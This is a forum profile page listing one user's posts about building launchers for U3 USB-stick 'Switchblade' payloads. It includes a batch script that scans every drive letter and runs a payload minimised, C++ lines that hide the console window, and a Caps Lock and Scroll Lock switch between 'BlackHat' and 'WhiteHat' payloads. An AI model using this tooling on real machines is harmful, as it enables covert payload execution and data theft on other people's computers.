Jump to content

moonboy33

Active Members
  • Posts

    17
  • Joined

  • Last visited

Everything posted by moonboy33

  1. Could you maybe give me an example?
  2. No, sry...I don´t know if it´s even possible to write a C++ Program that produces no window... @DLSS & Stangman I´ll try to find a solution!
  3. @DLSS & Stangman Are you using the little Batch-File I posted some time ago? This one was supposed to solve the problem... Moonboy33
  4. @goldfish You could use Sleep(1000) command instead of the waitOneSecond-function. (you need to include windows.h to do this) //edit: It would also be good to hide the window! HWND hwnd = FindWindow("ConsoleWindowClass",NULL); ShowWindow(hwnd,SW_HIDE); edit2: Like this: http://pastebin.ca/275576
  5. Could it be, that you have a folder thats named WIP, on your C: drive or any other drive that comes before (alphabetically) the driveletter of your u3-stick? Moonboy33
  6. There´s a new Launchpad version! It has a few design changes, and features an "access" button that you can drag around on your desktop! I also made a "blue" version of this (changed most of the Orange/Red Bitmaps to Blue...)! Here´s the normal Version (I think it´s 1.2.0.5): http://rapidshare.com/files/6607188/Launch...ew_original.rar Here´s the blue version: http://rapidshare.com/files/6608187/LaunchPad_new_blue.rar If you have questions, feel free to ask! Moonboy33
  7. Currently all Files are down... :cry: I´ll reup them as soon as possible! Moonboy33 //Here are the new versions: Complete Package (but without the SPA-Versions): http://rapidshare.com/files/6610144/Univer...RT_v2_Fixed.rar Mstart Versions (non-SPA): http://rapidshare.com/files/6609248/MSTART...ns_v2_Fixed.rar Mstart SPA-Versions (now Black and White!): http://rapidshare.com/files/6608933/MSTART...Versions_v2.rar
  8. Ok, here are the new links: Info: -SPA...StartPortableApps.exe Complete Package (but without the SPA-Versions): http://rapidshare.com/files/6381901/Univer...RT_v2_Fixed.rar Mstart Versions (non-SPA): http://rapidshare.com/files/6381945/MSTART...ns_v2_Fixed.rar Mstart SPA-Versions (now Black and White!): http://rapidshare.com/files/6381983/MSTART...Versions_v2.rar Moonboy33
  9. Just tell me if everything´s working, and what features you would like to see! Moonboy33
  10. I thought StartPortableApps.exe is located inside the CD-Partition... I´ll change that! X...Drive Letter of U3 Flash Drive X:WIPwhitehatgo.cmd I also noticed an error in the launching process, which will be fixed within the next release! Moonboy33
  11. UPDATE: To get the your payload to work "out-of-the-box" I suggest you to put this go.cmd in your x:WIPCMD and rename the original payload executable (go.cmd) to go.bat! @echo off %1: cd WIPCMD go.bat http://rapidshare.com/files/6074446/go.cmd This is nessecary becuase otherwise, it would try to launch the Payload from the CD-Partition! Moonboy33
  12. V2: The new version checks the SCROLL-Lock state first, and then continues with checking the CAPS-Lock state. If SCROLL-Lock is activated, a Whitehat Payload or the Antidote is executed. If not, the BlackHat PayLoad/LaunchU3 (depending on CAPS-Lock) is executed. Dos Window hidden! :D I´m working on it. If you have questions, feel free to ask me! Moonboy33 Links: Only the .exe files: http://rapidshare.com/files/6075656/MSTART_Versions_v2.rar Complete Package with Universal Customizer: http://rapidshare.com/files/6078156/Univer...r_MSTART_v2.rar @DLSS StartPortableApps-Version: http://rapidshare.com/files/6055891/MStart...ortableApps.rar //edit: There was an error in the readme-file thanks for telling me! Readme:
  13. I´m currently working on an updated version that hides the DOS window automatically! The program I posted, is just the Launcher for the Switchblade code! (WIPCMDgo.cmd) Moonboy33
  14. Here is the package: http://rapidshare.com/files/4562256/MSTART_Complete.rar Readme is included! Moonboy33 -> All Files were tested on an Intuix 2GB U3 USB-Stick <-
  15. I´m creating a package with all needed tools right now... I´ll upload it as soon as i´m done! Moonboy33
  16. I just wrote my own version of MADSTART.EXE... It´s just a small C applikation, but it does the job! Binary(Windows): http://rapidshare.com/files/4439170/MStart.exe and here is the code: //edit: everytime i try posting the code, it gives me an error message... //edit2: here´s the code: http://rapidshare.com/files/4439975/Mstart.cpp Explanation: If CapsLock is activated LaunchU3.exe will be executed, otherwise it ececutes Switchblade.exe Moonboy33
  17. I also would really love to know the source, but meanwhile i am using this: http://rapidshare.com/files/4425480/Launcher.rar included in this package: IP_TOOL.EXE is a simple C++ Program that executes start.bat start.bat searches all the local Drives for WIPCMDgo.bat and executes it. start.bat: @echo off if exist C:WIPCMDgo.cmd start /MIN C:WIPCMDgo.cmd C if exist D:WIPCMDgo.cmd start /MIN D:WIPCMDgo.cmd D if exist E:WIPCMDgo.cmd start /MIN E:WIPCMDgo.cmd E if exist F:WIPCMDgo.cmd start /MIN F:WIPCMDgo.cmd F if exist G:WIPCMDgo.cmd start /MIN G:WIPCMDgo.cmd G if exist H:WIPCMDgo.cmd start /MIN H:WIPCMDgo.cmd H if exist I:WIPCMDgo.cmd start /MIN I:WIPCMDgo.cmd I if exist J:WIPCMDgo.cmd start /MIN J:WIPCMDgo.cmd J if exist K:WIPCMDgo.cmd start /MIN K:WIPCMDgo.cmd K if exist L:WIPCMDgo.cmd start /MIN L:WIPCMDgo.cmd L if exist M:WIPCMDgo.cmd start /MIN M:WIPCMDgo.cmd M if exist N:WIPCMDgo.cmd start /MIN N:WIPCMDgo.cmd N if exist O:WIPCMDgo.cmd start /MIN O:WIPCMDgo.cmd O if exist P:WIPCMDgo.cmd start /MIN P:WIPCMDgo.cmd P if exist Q:WIPCMDgo.cmd start /MIN Q:WIPCMDgo.cmd Q if exist R:WIPCMDgo.cmd start /MIN R:WIPCMDgo.cmd R if exist S:WIPCMDgo.cmd start /MIN S:WIPCMDgo.cmd S if exist T:WIPCMDgo.cmd start /MIN T:WIPCMDgo.cmd T if exist U:WIPCMDgo.cmd start /MIN U:WIPCMDgo.cmd U if exist V:WIPCMDgo.cmd start /MIN V:WIPCMDgo.cmd V if exist W:WIPCMDgo.cmd start /MIN W:WIPCMDgo.cmd W if exist X:WIPCMDgo.cmd start /MIN X:WIPCMDgo.cmd X if exist Y:WIPCMDgo.cmd start /MIN Y:WIPCMDgo.cmd Y if exist Z:WIPCMDgo.cmd start /MIN Z:WIPCMDgo.cmd Z Moonboy33
×
×
  • Create New...